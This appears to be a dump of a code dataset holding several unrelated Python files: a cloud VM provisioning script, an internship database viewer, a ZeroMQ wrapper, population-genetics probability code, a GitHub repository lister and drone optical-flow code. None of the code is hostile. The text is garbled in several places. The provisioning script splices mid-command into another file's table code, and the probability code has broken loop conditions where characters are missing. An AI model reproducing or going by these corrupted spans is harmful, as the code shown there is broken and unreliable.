It cannot cause collisions\n    for file in [ 'id_ed25519', 'id_ecdsa', 'id_dsa', 'id_rsa' ]:\n        if os.access(sshdir+file+'.pub', 0) and os.access(sshdir+file, 0):\n            ssh_pub_key = open(sshdir+file+'.pub', 'r').read().split()\n            if len(ssh_pub_key) < 3:\n                ssh_pub_key.append(os.environ.get('USER'))\n            break\n\nif not ssh_key_names and not ssh_pub_key:\n    print(\"ERROR: env variable HCLOUD_SSHKEY_NAMES was empty, and could not find a key pair in ~/.ssh/\", file=sys.stderr)\n    sys.exit(1)\n\nuser = ssh_key_names[0] if ssh_key_names else ssh_pub_key[2]  # get user from key name, from local pubkey suffix, or from $USER\nuser = user.split('@')[0]  # strip domain part, if any\nsuff = ''.join(random.choice(string.ascii_lowercase+string.digits) for i in range(5))\nif args.unique: NAME = '-'.join([user, NAME, suff])\n\nlabels = { 'owner': user, 'origin': 'make_machine.py' }\nssh_key_list = []\nfor k in ssh_key_names:\n    bk = client.ssh_keys.get_by_name(k)\n    if not bk:\n        print(\"ERROR: key name '%s' is not known at hcloud\" % k, file=sys.stderr)\n        sys.exit(1)\n    ssh_key_list.append(client.ssh_keys.get_by_name(k))\nif ssh_pub_key:\n    k = client.ssh_keys.create(name=ssh_pub_key[2], public_key=ssh_pub_key[0]+' '+ssh_pub_key[1])\n    ssh_key_list.append(k)\n\nif debug: print(NAME, args.type, args.image, args.datacenter, ssh_key_names, ssh_pub_key, ssh_key_list, packages, file=sys.stderr)\nresponse = client.servers.create(name=NAME, server_type=ServerType(args.type), image=Image(args.image), ssh_keys=ssh_key_list, labels=labels)\nserver = response.server\nIPADDR = server.data_model.public_net.ipv4.ip\nprint(\"Machine created: %s\" % IPADDR, file=sys.stderr)\n\nserver.change_dns_ptr(IPADDR, NAME+'.hcloud.owncloud.com')  # needs an FQDN\n\n# CAUTION: keep in sync with ../hcloud_tf/make_machine.sh\nscript = \"\"\"\nexec 1>&2\t# all output goes to stderr.\nserver_image=\"%s\"\nIPADDR=\"%s\"\nextra_pkg=\"%s\"\ndo_login=\"%s\"\n\nssh-keygen -f ~/.ssh/known_hosts -R $IPADDR\t# needed to make life easier later.\n# StrictHostKeyChecking=no automatically adds new host keys and accepts changed host keys.\n\nfor i in 1 2 3 4 5 6 7 8 last; do\n  sleep 5\n  echo -n .\n  ssh -o ConnectTimeout=5 -o CheckHostIP=no -o StrictHostKeyChecking=no -o PasswordAuthentication=no root@$IPADDR uptime && break\n  if [ $i = last ]; then\n    echo \"Error: cannot ssh into machine at $IPADDR -- tried multiple times.\"\n    exit 1\n  fi\ndone\n\nif [ -n \"$extra_pkg\" ]; then\n  case \"$server_image\" in\n    ubuntu*|debian*)\n      ssh root@$IPADDR sh -x -s < 0:\n        table = BeautifulTable()\n        table.column_headers = [\"ID\", \"NAME\", \"COMPANY\", \"YEAR\",\"STATUS\"]\n        for l in lst:\n            status = \"Completed\" if l.status == 0 else \"Going on\" \n            table.append_row([l.id, l.iname, l.company, l.i_year,status])\n        print(table)\n    else:\n        print(f\"There are no Internship programs yet to add...\")\n\ndef _view_student_list(lst):\n    if lst and len(lst) > 0:\n        table = BeautifulTable()\n        table.column_headers = [\"USN\", \"NAME\", \"SEM\", \"PLACED\"]\n        for l in lst:\n            status = \"Placed\" if l.placed == 1 else \"Not placed\" \n            table.append_row([l.usn, l.name, l.sem, status])\n        print(table)\n    else:\n        print(f\"There are no Students yet to add...\")\n\n\ndef _view_registered_list(lst):\n    if lst and len(lst) > 0:\n        table = BeautifulTable()\n        table.column_headers = [\"Internship ID\", \"USN\", \"STATUS\"]\n        for l in lst:\n            status = \"Not completed\" if l.status == 0 else \"Completed\" \n            table.append_row([l.iid, l.usn, status])\n        print(table)\n    else:\n        print(f\"There are no Students 
registered for any internship!\")\n\ndef _view_company_count(lst):\n if lst and len(lst) > 0:\n table = BeautifulTable()\n table.column_headers = [\"Company\", \"Count\"]\n for l in lst:\n table.append_row([l.company, l.count])\n print(table)\n else:\n print(f\"There are no company taken internship!\")\n\ndef _view_student_count(lst):\n if lst and len(lst) > 0:\n table = BeautifulTable()\n table.column_headers = [\"USN\", \"NAME\",\"COUNT\"]\n for l in lst:\n table.append_row([l.usn, l.name,l.count])\n print(table)\n else:\n print(f\"No student joined any internship!\")\n\ndef _view_student_report(lst):\n if lst and len(lst) > 0:\n table = BeautifulTable()\n table.column_headers = [\"USN\", \"NAME\",\"INTERNSHIP NAME\",\"COMPANY\",\"YEAR\"]\n for l in lst:\n table.append_row([l.usn, l.name,l.iname,l.company,l.i_year])\n print(table)\n else:\n print(f\"No internship conducted yet!\") ","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":9106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"563153344","text":"import sys\nimport zmq\nimport logging\nimport json\n\n\n\nclass module(object):\n\n\n def __init__(self, mod_name, config):\n\n self.context = zmq.Context()\n self.config = config\n logging.basicConfig(format='%(asctime)s %(message)s', filename='log/module.log', level=logging.INFO)\n\n\n self.name = mod_name\n self.identity = self.config[mod_name]['identity']\n self.url = self.config[mod_name]['url']\n self.socket = self.context.socket(zmq.DEALER)\n self.establish_connection()\n\n\n self.poller = zmq.Poller()\n self.poller.register(self.socket, zmq.POLLIN)\n\n\n def establish_connection(self):\n\n self.socket.connect(self.url)\n self.sysout('established connection')\n\n\n def send(self, MESSAGE):\n\n self.socket.send_multipart(MESSAGE)\n self.sysout('send message', MESSAGE)\n\n\n def receive(self):\n\n MESSAGE = self.socket.recv_multipart()\n self.sysout('receive message', MESSAGE)\n\n return MESSAGE\n\n\n def create_message(self, TO = 'X', CORE = \"no input\"):\n\n if type(TO) is str:\n FROM = [self.identity]\n CORE_json = json.dumps(CORE)\n CORE_bytes = [CORE_json.encode('ascii')]\n ADDRESS = []\n TO = [self.config[TO]['identity']]\n\n elif type(TO) is list:\n MESSAGE_received = TO\n FROM = [self.identity]\n CORE_json = json.dumps(CORE)\n CORE_bytes = [CORE_json.encode('ascii')]\n MESSAGE_received.pop()\n TO = [MESSAGE_received.pop()]\n MESSAGE_received.pop()\n ADDRESS = MESSAGE_received\n\n MESSAGE = ADDRESS + TO + FROM + CORE_bytes\n return MESSAGE\n\n\n def extract_core(self, MESSAGE):\n CORE = MESSAGE[-1]\n CORE_json = CORE.decode('ascii')\n CORE_pyobj = json.loads(CORE_json)\n return CORE_pyobj\n\n\n def sysout(self, action, meta=False):\n\n sys.stdout.write('\\n'+'<> {} #'.format(self.name)+str(action)+'\\n'+'['+str(self.socket)+']'+'\\n'+'{}'.format(str(meta)+'\\n' if meta else '')+''+'\\n')\n\n\n sys.stdout.flush()\n\n\n logging.info('\\n<> {} #{}\\n [{}]\\n {}\\n'.format(self.name, str(action), str(self.socket), str(meta) if meta else ''))\n\n\n def destroy(self):\n self.socket.close()\n self.context.destroy()\n","sub_path":"DATABASE_EXTERN/DATABASE/Adds/remote_maintenance/structure/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"592139527","text":"#!/usr/bin/env python\nfrom setuptools import setup\n\nwith open(\"requirements.txt\") as 
requirement_file:\n    requirements = requirement_file.readlines()\n\nsetup(\n    name='keras2tensorflow',\n    version='1.0.0',\n    description='General code to convert a trained keras model into an inference tensorflow model',\n    # author='',\n    # author_email='',\n    # url='',\n    packages=[''],\n    entry_points={\n        'console_scripts': [\n            'keras2tensorflow = keras_to_tensorflow:main'\n        ]\n    },\n    install_requires=requirements,\n    classifiers=[\n        # 3 - Alpha\n        # 4 - Beta\n        # 5 - Production/Stable\n        'Development Status :: 4 - Beta',\n        'Topic :: Utilities',\n        'Intended Audience :: Developers',\n        'License :: OSI Approved :: MIT License',\n        'Programming Language :: Python :: 3'\n    ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
{"seq_id":"124578736","text":"##########################################\n# randomShowImage.py\n# randomly pick and show images from cifar10 using matplotlib\n##########################################\n\nfrom keras.datasets import cifar10\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n(x_train, y_train), (x_test, y_test) = cifar10.load_data()\n\n# show a 5x5 grid of images\nplt.figure(figsize=(10,10))\nfor i in range(25):\n    # np.random.randint(): draw one integer from [0, 50000)\n    rand_num = np.random.randint(0,50000)\n    # plt.subplot(): place the image at slot i+1 of the 5x5 grid\n    cifar_img = plt.subplot(5,5,i+1)\n    plt.imshow(x_train[rand_num])\n    # hide the x-axis tick labels\n    plt.tick_params(labelbottom=False)\n    # hide the y-axis tick labels\n    plt.tick_params(labelleft=False)\n    # show the ground-truth label\n    plt.title(y_train[rand_num])\nplt.show()\n\n# label meanings\n#0 - airplane\n#1 - automobile\n#2 - bird\n#3 - cat\n#4 - deer\n#5 - dog\n#6 - frog\n#7 - horse\n#8 - ship\n#9 - truck","sub_path":"python/keras/cifar10/randomshow.py","file_name":"randomshow.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
{"seq_id":"599525580","text":"import ray\nfrom numpy import *\nfrom scipy.stats import poisson\nfrom scipy.integrate import odeint, solve_ivp\n######################Pmum#######################\nfrom scipy.special import gamma as Gamma\ndef Di(tlife, n, g): return tlife * power(g,-(n - 1)) + (n - 1)*(g - 1) + 1 \n\ndef P(mu, n, d, g, tlife): return (2*mu**d/Gamma(d + 1))*g**(n - 1)*((Di(tlife, n, g) - 1.5)**d - ( (n - 1)*(g - 1) + 1 - 1.5)**d)\n\ndef cPmum(gamma, s, mu, tlife, n): return P(mu, n, 1. / s / (gamma-1.), gamma, tlife)\n \ndef Pmum(gamma, s, mu, tlife, n): return P(mu, n, ceil(1. 
/ s / (gamma-1.)), gamma, tlife)\n#################################################\n\n######################Q##########################\nscalar_type = float64\nint_type = int64\n\nzero = scalar_type(0)\none = scalar_type(1)\ntwo = scalar_type(2)\n\ndef one_m_exp_m(x): return x if x<1e-10 else one-exp(-x)\n\ndef gamma_sx(gamma,s,mc,x):\n return gamma / max(( 1 - s*(mc-x) * (gamma-1) ),finfo(scalar_type).tiny*1e6)\n #return (gamma * (gamma-1) / x)\ndef Qs(gamma, s, mc, tlife, mu, n, s_scheme, Nk):\n if s_scheme == \"scd\":\n gamma_s = array([nan]+[ gamma_sx(gamma,s,mc,x) for x in range(1,mc+1) ], dtype=scalar_type) #m = mc-x\n elif s_scheme == \"neutral\":\n gamma_s = array([nan]+[ gamma for x in range(1,mc+1) ], dtype=scalar_type) #m = mc-x\n else:\n gamma_s = array([nan]+[ (gamma - 2*s*(mc-x) * (gamma-1) ) / ( 1 - s*(mc-x) * (gamma-1) ) for x in range(1,mc+1) ], dtype=scalar_type) #m = mc-x\n #gamma_s = [None] + gamma_s\n\n tcorr=tlife\n #def W(x,k): return None if x==0 else power(gamma,k-n)*( one - s*(mc-x) * (gamma-one) )*tcorr/Nk[k]\n def W(x,k): return None if x==0 else power(gamma,k-n)*gamma_sx(gamma,s,mc,x)*tcorr/Nk[k]\n \n Q = array( [ [scalar_type(0.0) for k in range(n+1)] for x in range(mc+1) ], dtype=scalar_type )\n Q[:,n] = 0\n Q[0,:] = 1\n for x in range(1,mc+1):\n for k in range(0,n)[::-1]:\n Q[x, k] = one_m_exp_m( ( \n mu * (gamma_s[x]-two) * Q[x-1,k ] +\n mu * gamma_s[x] * Q[x-1,k+1] +\n gamma_s[x] * Q[x ,k+1] \n ) * one_m_exp_m(W(x,k)) )\n return Q\n\ndef PQ(gamma, tlife, s, mu, n, s_scheme=\"neutral\", Nk = ones(0), rng = random.default_rng()):\n if Nk.size==0:\n Nk=ones(n)\n \n mc = int(ceil( 1. / s / (gamma-1.) ))\n\n Q = Qs(gamma, s, mc, tlife, mu, n, s_scheme, Nk)\n \n lambda0 = power( gamma, one-n ) * mu * tlife\n \n Pc = poisson.sf(mc-1,double(lambda0))\n\n Cm = array([poisson.sf(m,double(lambda0)) for m in range(mc)]) / mu\n\n Mm = array([ Cm[0] + poisson.pmf(0,double(lambda0)) - one if m==0 else Cm[m] + poisson.pmf(m,double(lambda0)) for m in range(mc)])\n\n Qm = array([ Q[mc-m,1] for m in range(mc) ])\n \n return two*Pc + sum( Mm * Qm ) + sum( Nk[1:n]*Q[mc,1:n] )\n\ndef iMQ_ivp_times(gamma, tlife, s, mu, n, times, s_scheme=\"scd\", Nk = ones(0)):\n if Nk.size==0:\n Nk=ones(n)\n\n mc = int(ceil( 1. / s / (gamma-1.) ))\n Q = Qs(gamma, s, mc, tlife, mu, n, s_scheme, Nk)\n \n p0 = zeros(mc+1)\n p0[0] = one\n \n t = zero\n pi = zero\n\n def dpdt(t,p,gamma,s,mc,n):\n Q = Qs(gamma, s, mc, t, mu, n, s_scheme, Nk)\n r = power( gamma, one-n )\n # d_m = r*( mu + mu * Q[mc-m-1,1] + (1-mu) * Q[mc-m,1] )\n d = zeros(mc, dtype=scalar_type)\n di = zeros(mc, dtype=scalar_type)\n for m in range(mc):\n d[m] = r * ( mu + mu * Q[mc-m-1,1] + (one-mu) * Q[mc-m,1] )\n di[m] = r * ( mu * Q[mc-m-1,1] + (one-mu) * Q[mc-m,1] )\n di[mc-1] += r * mu\n dp = zeros(p.size)\n dp[:mc] = -d * p[:mc]\n dp[1:mc] += d[:mc-1] * p[:mc-1]\n dp[mc] = sum(p[:mc] * di)\n return dp\n \n p = solve_ivp(dpdt,[0,tlife],p0,args=(gamma,s,mc,n),t_eval=times,method=\"Radau\")\n return p.y[-1] + sum(Nk * Q[mc,1:])\n\n\ndef iMQ_ivp(gamma, tlife, s, mu, n, s_scheme=\"scd\", Nk = ones(0)):\n mc = int(ceil( 1. / s / (gamma-1.) 
))\n    return iMQ_ivp_mc(gamma, tlife, s, mc, mu, n, s_scheme, Nk)\n\ndef iMQ_ivp_mc(gamma, tlife, s, mc, mu, n, s_scheme=\"scd\", Nk = ones(0)):\n    if Nk.size==0:\n        Nk=ones(n)\n\n    \n    Q = Qs(gamma, s, mc, tlife, mu, n, s_scheme, Nk)\n    di = zeros(mc, dtype=scalar_type)\n    \n    r = power( gamma, one-n )\n#   d_m = r*( mu + mu * Q[mc-m-1,1] + (1-mu) * Q[mc-m,1] )\n    d = zeros(mc, dtype=scalar_type)\n    for m in range(mc):\n        d[m] = r * ( mu + mu * Q[mc-m-1,1] + (one-mu) * Q[mc-m,1] )\n        di[m] = r * ( mu * Q[mc-m-1,1] + (one-mu) * Q[mc-m,1] )\n    di[mc-1] += r * mu\n    \n    p0 = zeros(mc+1)\n    p0[0] = one\n    \n    t = zero\n    pi = zero\n\n    def dpdt(t,p,d,di):\n        dp = zeros(p.size)\n        dp[:mc] = -d * p[:mc]\n        dp[1:mc] += d[:mc-1] * p[:mc-1]\n        dp[mc] = sum(p[:mc] * di)\n        return dp\n    \n    p = solve_ivp(dpdt,[0,tlife],p0,args=(d,di),method=\"Radau\")\n    return p.y[-1][-1] + sum(Nk * Q[mc,1:])\n\n\ndef iMQ_odeint(gamma, tlife, s, mu, n, s_scheme=\"scd\", Nk = ones(0)):\n    if Nk.size==0:\n        Nk=ones(n)\n\n    mc = int(ceil( 1. / s / (gamma-1.) ))\n    \n    Q = Qs(gamma, s, mc, tlife, mu, n, s_scheme, Nk)\n    di = zeros(mc, dtype=scalar_type)\n    \n    r = power( gamma, one-n )\n#   d_m = r*( mu + mu * Q[mc-m-1,1] + (1-mu) * Q[mc-m,1] )\n    d = zeros(mc, dtype=scalar_type)\n    for m in range(mc):\n        d[m] = r * ( mu + mu * Q[mc-m-1,1] + (one-mu) * Q[mc-m,1] )\n        di[m] = r * ( mu * Q[mc-m-1,1] + (one-mu) * Q[mc-m,1] )\n    di[mc-1] += r * mu\n    \n    p0 = zeros(mc+1)\n    p0[0] = one\n    \n    t = zero\n    pi = zero\n\n    def dpdt(p,t,d,di):\n        dp = zeros(p.size)\n        dp[:mc] = -d * p[:mc]\n        dp[1:mc] += d[:mc-1] * p[:mc-1]\n        dp[mc] = sum(p[:mc] * di)\n        return dp\n    \n    p = odeint(dpdt,p0,[0,tlife],args=(d,di))\n    return p[1][mc] + sum(Nk * Q[mc,1:])\n\n\ndef iMQ_euler(gamma, tlife, s, mu, n, s_scheme=\"scd\", delta=1., Nk = ones(0)):\n    if Nk.size==0:\n        Nk=ones(n)\n\n    mc = int(ceil( 1. / s / (gamma-1.) 
))\n    \n    Q = Qs(gamma, s, mc, tlife, mu, n, s_scheme, Nk)\n    di = zeros(mc, dtype=scalar_type)\n    \n    r = power( gamma, one-n )\n    d = zeros(mc, dtype=scalar_type)\n    for m in range(mc):\n        d[m] = r * ( mu + mu * Q[mc-m-1,1] + (one-mu) * Q[mc-m,1] )\n        di[m] = r * ( mu * Q[mc-m-1,1] + (one-mu) * Q[mc-m,1] )\n    di[mc-1] += r * mu\n    \n    p=zeros(mc)\n    dp=zeros(mc)\n    p[0]=one\n    delta_t=delta*one/r\n    \n    t=zero\n    pi=zero\n    while t abs(d[i]-d[j]):\n                #print(i,j,d[i],d[j],d[i]-d[j])\n                d[i]+= (1.-rng.random())*epsilon*min(d[i],d[j])\n                d[j]+= (1.-rng.random())*epsilon*min(d[i],d[j])\n                #print(i,j,d[i],d[j],d[i]-d[j])\n\n# C_m = r*(r*mu)^m * sum_{i=0}^{m} (1-exp(-d_i*t))/d_i / prod_{j=0,j!=i}^{m} (d_j-d_i)\n    C = zeros(mc+1, dtype=scalar_type)\n    for m in range(mc):\n        positive_Cs=[]\n        negative_Cs=[]\n        prods=[]\n        for i in range(m+1):\n            prod = one\n            for j in range(m+1):\n                if i!=j:\n                    #print(r * mu * Q[mc-j-1,1] , r * mu * Q[mc-i-1,1] , r * (one-mu) * Q[mc-j,1] , r * (one-mu) * Q[mc-i,1],r * mu * Q[mc-j-1,1] - r * mu * Q[mc-i-1,1] + r * (one-mu) * Q[mc-j,1] - r * (one-mu) * Q[mc-i,1])\n                    prod *= d[j]- d[i] #- one #r * mu * Q[mc-j-1,1] - r * mu * Q[mc-i-1,1] + r * (one-mu) * Q[mc-j,1] - r * (one-mu) * Q[mc-i,1]\n            #if prod!=1:\n            #    prod *= power(d[i],m-1)\n            C_term = r * power( r * mu , m ) * one_m_exp_m(d[i]*tlife) / d[i] / prod \n            prods+=[prod]\n            if C_term>0:\n                positive_Cs+=[C_term]\n            else:\n                negative_Cs+=[C_term]\n            \n            #print(one_m_exp_m(d[i]*tlife),d[i],prod, r * power( r * mu , m ) * one_m_exp_m(d[i]*tlife) / d[i] / prod)\n        Csum = 0\n        negative_Cs = sorted(negative_Cs)\n        positive_Cs = sorted(positive_Cs)[::-1]\n#        print(negative_Cs)\n#        print(positive_Cs)\n#        print(r * power( r * mu , m )*tlife/array(prods))\n        Cs=[]\n        for i in range(max(len(positive_Cs),len(negative_Cs))):\n            Cs+=[0]\n            if i tlife:\n        return PT0(mc)\n    \n    if rates[\"scd\"][k] > rng.random() * rates[\"R\"][k]:\n        PA = PT(t, k, n, rates, tlife, mc, poi, rng) \n        PB = PT(t, k, n, rates, tlife, mc, poi, rng)\n    else:\n        PA = PT(t, k+1, n, rates, tlife, mc, poi, rng) \n        PB = PT(t, k+1, n, rates, tlife, mc, poi, rng)\n    PAp = zeros(mc+1)\n    PBp = zeros(mc+1)\n    return merge(PA, PB, poi, mc)\n\ndef PT0_flat(t,rates, n, tlife, mc, poi,rng):\n    PAs=[]\n    while t < tlife:\n        PA=PT(t, 0, n, rates, tlife, mc, poi, rng) \n        PAs+=[PA]\n        t += rng.exponential(1./rates[\"scdd\"][0])\n    PAB = PT0(mc)\n    for PA in PAs:\n        PAB = merge(PA, PAB, poi, mc)\n    return PAB[mc] #eq. 5\n\n#truncated PT0_flat\ndef PT0_flat_K(t, rates, n, tlife, mc, poi, rng=random.default_rng(), K=100):\n    if K>int(tlife*rates[\"scdd\"][0]):\n        K=int(ceil(tlife*rates[\"scdd\"][0]))\n    Krange=range(K)\n    PAs=[PT(t, 0, n, rates, tlife, mc, poi, rng) for i in Krange]\n    PAB = PT0(mc)\n    while t < tlife:\n        PAB = merge(PAs[random.choice(Krange)], PAB, poi, mc)\n        t += rng.exponential(1./rates[\"scdd\"][0])\n    return PAB[mc]#eq. 5\n\ndef T(gamma, n, tlife, Nk, s, mu, F=PT0_flat, rng=random.default_rng()):#rates and precalc.\n\n    mc = int(ceil( 1. / s / (gamma-1.) 
))\n    \n    poi = array([ poisson.pmf(m, mu) for m in range(mc+2)])\n    \n    delta = array([power( gamma, 1 - (n-k) ) for k in range(n)])\n    \n    p = 1 # for now ..\n    q = 2./gamma\n    rates={}\n    rates[\"scd\"] = array([0 if k==0 or k==n else 0.5 * delta[k] / Nk[k] * (1-q) for k in range(n) ])\n    rates[\"scdd\"]= array([ delta[k] / Nk[k] if k==0 else 0.5 * delta[k] / Nk[k] for k in range(n) ])\n    rates[\"R\"] = rates[\"scd\"] + rates[\"scdd\"]\n    \n    return F(0,rates,n,tlife,mc,poi,rng)\n#################################################\n\n#################ray#############################\n#utility functions for ray\n@ray.remote\ndef PTray(t,k,n,rates,tlife,mc,poi,rng):\n    return PT(t,k,n,rates,tlife,mc,poi,rng)\n@ray.remote\ndef Tray(gamma, n, tlife, Nk, s, mu):\n    return T(gamma, n, tlife, Nk, s, mu, PT0_flat_K)\n\n#per progenitor subtree parallelization of PT0_flat\ndef PT0_flat_ray(t, rates, n, tlife, mc, poi, rng=random.default_rng()):\n    PAs=[]\n    while t < tlife:\n        PA=PTray.remote(t, 0, n, rates, tlife, mc, poi, rng) \n        PAs+=[PA]\n        t += rng.exponential(1./rates[\"scdd\"][0])\n    PAs = ray.get(PAs)\n    PAB = PT0(mc)\n    for PA in PAs:\n        PAB = merge(PA, PAB, poi, mc)\n    return PAB[mc]#eq. 5\n\n#truncated per progenitor subtree parallelization of PT0_flat\ndef PT0_flat_ray_K(t, rates, n, tlife, mc, poi, rng=random.default_rng(), K=100):\n    Krange=range(K)\n    PAs=ray.get([PTray.remote(t, 0, n, rates, tlife, mc, poi, rng) for i in Krange])\n    PAB = PT0(mc)\n    while t < tlife:\n        PAB = merge(PAs[random.choice(Krange)], PAB, poi, mc)\n        t += rng.exponential(1./rates[\"scdd\"][0])\n    return PAB[mc]#eq. 5\n\n#################################################\n\n","sub_path":"Heatmaps_FIG_S2_S3_ipynb_reproduce/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":13667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
{"seq_id":"252246220","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/muntjac/demo/sampler/features/layouts/ExpandingComponentExample.py\n# Compiled at: 2013-04-04 15:36:38\nfrom muntjac.api import VerticalLayout, HorizontalLayout, Button\n\nclass ExpandingComponentExample(VerticalLayout):\n\n    def __init__(self):\n        super(ExpandingComponentExample, self).__init__()\n        self.setSpacing(True)\n        layout = HorizontalLayout()\n        layout.setWidth('100%')\n        self.addComponent(layout)\n        naturalButton = Button('Natural')\n        naturalButton.setDescription(\"This button does not have an explicit size - instead, its size depends on it's content - a.k.a natural size.\")\n        layout.addComponent(naturalButton)\n        expandedButton = Button('Expanded')\n        expandedButton.setWidth('100%')\n        expandedButton.setDescription('The width of this button is set to 100% and expanded, and will thus occupy the space left over by the other components.')\n        layout.addComponent(expandedButton)\n        layout.setExpandRatio(expandedButton, 1.0)\n        sizedButton = Button('Explicit')\n        sizedButton.setWidth('150px')\n        sizedButton.setDescription('This button is explicitly set to be 150 pixels wide.')\n        layout.addComponent(sizedButton)\n        layout = HorizontalLayout()\n        layout.setWidth('100%')\n        self.addComponent(layout)\n        naturalButton = Button('Natural')\n        naturalButton.setDescription(\"This button does not have an explicit size - instead, its size depends on it's content - a.k.a natural size.\")\n        layout.addComponent(naturalButton)\n        expandedButton1 = Button('Ratio 1.0')\n        expandedButton1.setWidth('100%')\n        expandedButton1.setDescription('The width of this button 
is set to 100% and expanded with a ratio of 1.0, and will in this example occupy 1:3 of the leftover space.')\n        layout.addComponent(expandedButton1)\n        layout.setExpandRatio(expandedButton1, 1.0)\n        expandedButton2 = Button('Ratio 2.0')\n        expandedButton2.setWidth('100%')\n        expandedButton2.setDescription('The width of this button is set to 100% and expanded with a ratio of 2.0, and will in this example occupy 2:3 of the leftover space.')\n        layout.addComponent(expandedButton2)\n        layout.setExpandRatio(expandedButton2, 2.0)","sub_path":"pycfiles/Muntjac-1.1.2-py2.7/ExpandingComponentExample.py","file_name":"ExpandingComponentExample.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
{"seq_id":"229268594","text":"import torch\nfrom torch import nn\nfrom ffnn import FFNN\n\nclass BOW_FFNN(nn.Module):\n    def __init__(self, embeddings, hidden_size, output_size, freeze = True):\n        super(BOW_FFNN,self).__init__()\n        self.voca_size,self.input_size = embeddings.size()\n        self.hidden_size = hidden_size\n        self.output_size = output_size\n        self.freeze = freeze\n        self.bow = nn.EmbeddingBag.from_pretrained(embeddings,self.freeze,mode='mean')\n        self.ffnn = FFNN(self.input_size,self.hidden_size,self.output_size)\n\n    def forward(self,input):\n        return nn.functional.log_softmax(self.ffnn(self.bow(input,torch.LongTensor([0]))), dim=1)","sub_path":"Trash/00QuestionClassifier/bow_ffnn.py","file_name":"bow_ffnn.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
{"seq_id":"127187968","text":"# 1. Read the GitHub API documentation, figure out how to list the repositories\n# of a given user, and save the JSON output to a *.json file.\n\nimport requests\nimport json\n\nusername = input(\"Enter a github username: \")\n\n\nmain_link = 'https://api.github.com/users'\n\nresponse = requests.get(f'{main_link}/{username}/repos')\ndata = json.loads(response.text)\n\nrepo_names = {}\n\nfor idx, repo in enumerate(data):\n    repo_names[idx] = repo['name']\n\nprint(repo_names)\n\nwith open(\"repos.json\", \"w\") as f:\n    json.dump(repo_names,f)\n\n","sub_path":"task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
{"seq_id":"614144052","text":"import cv2 as cv\nimport numpy as np\n#import dronekit as dk\n#import dronekit_sitl\n#from pymavlink import mavutil\nimport time\nfrom time import gmtime, strftime\nimport os\n\n\ndef arm_and_takeoff(aTargetAltitude):\n    print(\"Basic pre-arm checks\")\n    while not vehicle.is_armable:\n        print(\" Waiting for vehicle to initialise...\")\n        time.sleep(1)\n\n    print(\"Arming motors\")\n    vehicle.mode = dk.VehicleMode(\"GUIDED\")\n    vehicle.armed = True\n    while not vehicle.armed:\n        print(\" Waiting for arming...\")\n        time.sleep(1)\n\n    print(\"Taking off!\")\n    vehicle.simple_takeoff(aTargetAltitude)  # Take off to target altitude\n    while True:\n        print(\" Altitude: \", vehicle.location.global_relative_frame.alt)\n        if vehicle.location.global_relative_frame.alt >= aTargetAltitude * 0.95:\n            print(\"Reached target altitude\")\n            break\n        time.sleep(1)\n\n\ndef send_ned_velocity(velocity_x, velocity_y, velocity_z):\n    msg = vehicle.message_factory.set_position_target_local_ned_encode(\n        0, # time_boot_ms (not used)\n        0, 0, # target system, target component\n        mavutil.mavlink.MAV_FRAME_BODY_NED, # frame\n        0b0000111111000111, # type_mask 
(only speeds enabled)\n 0, 0, 0, # x, y, z positions (not used)\n velocity_x, velocity_y, velocity_z, # x, y, z velocity in m/s\n 0, 0, 0, # x, y, z acceleration (not supported yet, ignored in GCS_Mavlink)\n 0, 0) # yaw, yaw_rate (not supported yet, ignored in GCS_Mavlink)\n vehicle.send_mavlink(msg)\n vehicle.flush()\n\n\ndef goto_position_target_local_ned(north, east, down):\n msg = vehicle.message_factory.set_position_target_local_ned_encode(\n 0, # time_boot_ms (not used)\n 0, 0, # target system, target component\n mavutil.mavlink.MAV_FRAME_BODY_NED, # frame\n 0b0000111111111000, # type_mask (only positions enabled)\n north, east, down, # x, y, z positions (or North, East, Down in the MAV_FRAME_BODY_NED frame\n 0, 0, 0, # x, y, z velocity in m/s (not used)\n 0, 0, 0, # x, y, z acceleration (not supported yet, ignored in GCS_Mavlink)\n 0, 0) # yaw, yaw_rate (not supported yet, ignored in GCS_Mavlink)\n # send command to vehicle\n vehicle.send_mavlink(msg)\n vehicle.flush()\n\n\ndef draw_flow(img, flow, step=8):\n h, w = img.shape[:2]\n y, x = np.mgrid[step / 2:h:step, step / 2:w:step].reshape(2, -1).astype(int)\n\n fx, fy = flow[y, x].T\n\n lines = np.vstack([x, y, x + fx, y + fy]).T.reshape(-1, 2, 2)\n lines = np.int32(lines + 0.5)\n vis = cv.cvtColor(img, cv.COLOR_GRAY2BGR)\n for (x1, y1), (x2, y2) in lines:\n #if ((x1 - x2) * (x1 - x2) + (y1 - y2) * (y1 - y2)) ** 0.5 > 35:\n if abs(x1 - x2) > 10 and abs(y1 - y2) > 10 :\n cv.circle(vis, (x1, y1), 15, (0, 0, 255), -1)\n cv.circle(vis, (x2, y2), 15, (0, 0, 255), -1)\n\n # cv.polylines(vis, lines, 0, (0, 255, 0))\n\n return vis\n\n\ndef draw_flow_orig(img, flow, step=16):\n h, w = img.shape[:2]\n y, x = np.mgrid[step/2:h:step, step/2:w:step].reshape(2,-1).astype(int)\n\n fx, fy = flow[y,x].T\n\n lines = np.vstack([x, y, x+fx, y+fy]).T.reshape(-1, 2, 